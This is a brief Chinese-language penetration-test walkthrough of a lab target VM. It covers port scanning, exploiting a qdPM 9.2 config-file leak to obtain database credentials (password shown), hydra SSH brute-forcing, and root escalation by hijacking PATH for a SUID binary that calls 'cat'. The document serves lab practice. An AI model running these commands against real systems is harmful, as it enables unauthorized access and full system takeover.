kali:192.168.111.111
靶机:192.168.111.130
信息收集
端口扫描
nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.130
访问目标80,发现目标CMS为qdPM 9.2
搜索对应漏洞发现存在信息泄露
searchsploit qdpm
访问192.168.111.130/core/config/databases.yml得到目标数据库账号密码
利用数据库中的账号密码爆破ssh
mysql -uqdpmadmin -pUcVQCMQk2STVeS6J -h192.168.111.130
hydra -L ./user.txt -P ./pass.txt 192.168.111.130 -s 22 ssh -t 64
提权
查找suid权限的文件
find / -perm -u=s 2> /dev/null
该程序执行的时候同时会执行cat命令
strings /opt/get_access
修改环境变量提权
echo 'cp /bin/bash /tmp/bash;chmod 4777 /tmp/bash' > /tmp/cat
chmod 777 /tmp/cat
export PATH=/tmp:$PATH
./get_access
/tmp/bash -p
